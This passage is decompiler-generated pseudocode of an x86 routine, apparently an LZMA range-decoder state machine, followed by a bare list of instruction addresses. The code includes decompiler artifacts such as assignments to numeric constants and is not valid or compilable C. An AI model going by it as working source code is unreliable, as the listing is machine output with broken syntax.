												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L88:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L89:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L109:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t365 = __ebp - 0x70;
											 *_t365 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t365;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L111;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											while(1) {
												 *(_t613 - 0x54) = _t606;
												goto L133;
											}
										case 0x12:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 0x58);
												 *(__ebp - 0x84) = 0x13;
												__esi =  *(__ebp - 0x58) + 2;
												while(1) {
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											}
											__eax =  *(__ebp - 0x4c);
											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											__eflags = __eax;
											__eax =  *(__ebp - 0x58) + __eax + 4;
											goto L130;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												L144:
												 *(__ebp - 0x7c) = 0x14;
												goto L145;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											L130:
											 *(__ebp - 0x58) = __eax;
											 *(__ebp - 0x40) = 3;
											goto L144;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											 *(_t613 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L120;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											L145:
											__eax =  *(__ebp - 0x40);
											 *(__ebp - 0x50) = 1;
											 *(__ebp - 0x48) =  *(__ebp - 0x40);
											goto L149;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											L149:
											__eflags =  *(__ebp - 0x48);
											if( *(__ebp - 0x48) <= 0) {
												__ecx =  *(__ebp - 0x40);
												__ebx =  *(__ebp - 0x50);
												0 = 1;
												__eax = 1 << __cl;
												__ebx =  *(__ebp - 0x50) - (1 << __cl);
												__eax =  *(__ebp - 0x7c);
												 *(__ebp - 0x44) = __ebx;
												while(1) {
													 *(_t613 - 0x88) = _t533;
													goto L1;
												}
											}
											__eax =  *(__ebp - 0x50);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
											__eax =  *(__ebp - 0x58);
											__esi = __edx + __eax;
											 *(__ebp - 0x54) = __esi;
											__ax =  *__esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												__cx = __ax >> 5;
												__eax = __eax - __ecx;
												__edx = __edx + 1;
												__eflags = __edx;
												 *__esi = __ax;
												 *(__ebp - 0x50) = __edx;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L148;
											} else {
												goto L146;
											}
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L119:
												_t393 = __ebp - 0x2c;
												 *_t393 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t393;
												L120:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t400 = __ebp - 0x60;
												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t400;
												goto L123;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L102:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L108:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L112:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t391 = __ebp - 0x2c;
														 *_t391 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t391;
														goto L119;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L111:
														_t368 = __ebp - 0x48;
														 *_t368 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t368;
														goto L112;
													} else {
														goto L109;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L101:
													_t338 = __ebp - 0x48;
													 *_t338 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t338;
													goto L102;
												} else {
													goto L99;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L108;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L79;
										case 0x1b:
											L75:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t274 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t274;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t283 = __ebp - 0x64;
											 *_t283 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t283;
											 *( *(__ebp - 0x68)) = __cl;
											L79:
											 *(__ebp - 0x14) = __edx;
											goto L80;
										case 0x1c:
											while(1) {
												L123:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t414 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t414;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t414;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L80:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											goto L170;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
					}
				}
			}

0x00000000
0x0040663c
0x0040663c
0x00406640
0x00406669
0x00406673
0x00406642
0x0040664b
0x00406658
0x0040665b
0x0040699f
0x0040699f
0x004069a2
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x004069f0
0x004069f4
0x00406ba3
0x00406bb9
0x00406bc1
0x00406bc8
0x00406bca
0x00406bd1
0x00406bd5
0x00406bd5
0x00406a00
0x00406a07
0x00406a0f
0x00406a12
0x00406a15
0x00406a15
0x00406a1b
0x00406a1b
0x004061b7
0x004061b7
0x004061b7
0x004061c0
0x00000000
0x00000000
0x004061c6
0x00000000
0x004061d1
0x00000000
0x00000000
0x004061da
0x004061dd
0x004061e0
0x004061e4
0x00000000
0x00000000
0x004061ea
0x004061ed
0x004061ef
0x004061f0
0x004061f3
0x004061f5
0x004061f6
0x004061f8
0x004061fb
0x00406200
0x00406205
0x0040620e
0x00406221
0x00406224
0x00406230
0x00406258
0x0040625a
0x00406268
0x00406268
0x0040626c
0x00000000
0x00000000
0x00000000
0x00000000
0x0040625c
0x0040625c
0x0040625f
0x00406260
0x00406260
0x00000000
0x0040625c
0x00406236
0x0040623b
0x0040623b
0x00406244
0x0040624c
0x0040624f
0x00000000
0x00406255
0x00406255
0x00000000
0x00406255
0x00000000
0x00406272
0x00406272
0x00406276
0x00406b22
0x00000000
0x00406b22
0x0040627f
0x0040628f
0x00406292
0x00406295
0x00406295
0x00406295
0x00406298
0x0040629c
0x00000000
0x00000000
0x0040629e
0x004062a4
0x004062ce
0x004062d4
0x004062db
0x00000000
0x004062db
0x004062aa
0x004062ad
0x004062b2
0x004062b2
0x004062bd
0x004062c5
0x004062c8
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0040630d
0x00406313
0x00406316
0x00406323
0x0040632b
0x0040699f
0x00000000
0x00000000
0x004062e2
0x004062e2
0x004062e6
0x00406b31
0x00000000
0x00406b31
0x004062f2
0x004062fd
0x004062fd
0x004062fd
0x00406300
0x00406303
0x00406306
0x0040630b
0x00000000
0x00000000
0x00000000
0x00000000
0x004069a2
0x004069a2
0x004069a8
0x004069ae
0x004069b4
0x004069ce
0x004069d1
0x004069d7
0x004069e2
0x004069e4
0x004069b6
0x004069b6
0x004069c5
0x004069c9
0x004069c9
0x004069ee
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00406333
0x00406335
0x00406338
0x004063a9
0x004063ac
0x004063af
0x004063b6
0x004063c0
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x0040633a
0x0040633e
0x00406341
0x00406343
0x00406346
0x00406349
0x0040634b
0x0040634e
0x00406350
0x00406355
0x00406358
0x0040635b
0x0040635f
0x00406366
0x00406369
0x00406370
0x00406374
0x0040637c
0x0040637c
0x0040637c
0x00406376
0x00406376
0x00406376
0x0040636b
0x0040636b
0x0040636b
0x00406380
0x00406383
0x004063a1
0x004063a3
0x00000000
0x00406385
0x00406385
0x00406388
0x0040638b
0x0040638e
0x00406390
0x00406390
0x00406390
0x00406393
0x00406396
0x00406398
0x00406399
0x0040639c
0x00000000
0x0040639c
0x00000000
0x004065d2
0x004065d6
0x004065f4
0x004065f7
0x004065fe
0x00406601
0x00406604
0x00406607
0x0040660a
0x0040660d
0x0040660f
0x00406616
0x00406617
0x00406619
0x0040661c
0x0040661f
0x00406622
0x00406622
0x00406627
0x00000000
0x00406627
0x004065d8
0x004065db
0x004065de
0x004065e8
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x00000000
0x00000000
0x00000000
0x0040667f
0x00406683
0x00000000
0x00000000
0x00406689
0x0040668d
0x00000000
0x00000000
0x00406693
0x00406695
0x00406699
0x00406699
0x0040669c
0x004066a0
0x00000000
0x00000000
0x004066f0
0x004066f4
0x004066fb
0x004066fe
0x00406701
0x0040670b
0x0040699f
0x0040699f
0x00000000
0x0040699f
0x0040699f
0x004066f6
0x00000000
0x00000000
0x00406717
0x0040671b
0x00406722
0x00406725
0x00406728
0x0040671d
0x0040671d
0x0040671d
0x0040672b
0x0040672e
0x00406731
0x00406731
0x00406734
0x00406737
0x0040673a
0x0040673a
0x0040673d
0x00406744
0x00406749
0x00000000
0x00000000
0x004067d7
0x004067d7
0x004067db
0x00406b79
0x00000000
0x00406b79
0x004067e1
0x004067e4
0x004067e7
0x004067eb
0x004067ee
0x004067f4
0x004067f6
0x004067f6
0x004067f6
0x004067f9
0x004067fc
0x00000000
0x00000000
0x004063cc
0x004063cc
0x004063d0
0x00406b3d
0x00000000
0x00406b3d
0x004063d6
0x004063d9
0x004063dc
0x004063e0
0x004063e3
0x004063e9
0x004063eb
0x004063eb
0x004063eb
0x004063ee
0x004063f1
0x004063f1
0x004063f4
0x004063f7
0x00000000
0x00000000
0x004063fd
0x00406403
0x00000000
0x00000000
0x00406409
0x00406409
0x0040640d
0x00406410
0x00406413
0x00406416
0x00406419
0x0040641a
0x0040641d
0x0040641f
0x00406425
0x00406428
0x0040642b
0x0040642e
0x00406431
0x00406434
0x00406437
0x00406453
0x00406456
0x00406459
0x0040645c
0x00406463
0x00406467
0x00406469
0x0040646d
0x00406439
0x00406439
0x0040643d
0x00406445
0x0040644a
0x0040644c
0x0040644e
0x0040644e
0x00406470
0x00406477
0x0040647a
0x00000000
0x00406480
0x00000000
0x00406480
0x00000000
0x00406485
0x00406485
0x00406489
0x00406b49
0x00000000
0x00406b49
0x0040648f
0x00406492
0x00406495
0x00406499
0x0040649c
0x004064a2
0x004064a4
0x004064a4
0x004064a4
0x004064a7
0x004064aa
0x004064aa
0x004064aa
0x004064b0
0x00000000
0x00000000
0x004064b2
0x004064b5
0x004064b8
0x004064bb
0x004064be
0x004064c1
0x004064c4
0x004064c7
0x004064ca
0x004064cd
0x004064d0
0x004064e8
0x004064eb
0x004064ee
0x004064f1
0x004064f1
0x004064f4
0x004064f8
0x004064fa
0x004064d2
0x004064d2
0x004064da
0x004064df
0x004064e1
0x004064e3
0x004064e3
0x004064fd
0x00406504
0x00406507
0x00000000
0x00406509
0x00000000
0x00406509
0x00406507
0x0040650e
0x0040650e
0x0040650e
0x0040650e
0x00000000
0x00000000
0x00406549
0x00406549
0x0040654d
0x00406b55
0x00000000
0x00406b55
0x00406553
0x00406556
0x00406559
0x0040655d
0x00406560
0x00406566
0x00406568
0x00406568
0x00406568
0x0040656b
0x0040656e
0x0040656e
0x00406574
0x00406512
0x00406512
0x00406515
0x00000000
0x00406515
0x00406576
0x00406576
0x00406579
0x0040657c
0x0040657f
0x00406582
0x00406585
0x00406588
0x0040658b
0x0040658e
0x00406591
0x00406594
0x004065ac
0x004065af
0x004065b2
0x004065b5
0x004065b5
0x004065b8
0x004065bc
0x004065be
0x00406596
0x00406596
0x0040659e
0x004065a3
0x004065a5
0x004065a7
0x004065a7
0x004065c1
0x004065c8
0x004065cb
0x00000000
0x004065cd
0x00000000
0x004065cd
0x00000000
0x0040685a
0x0040685a
0x0040685e
0x00406b85
0x00000000
0x00406b85
0x00406864
0x00406867
0x0040686a
0x0040686e
0x00406871
0x00406877
0x00406879
0x00406879
0x00406879
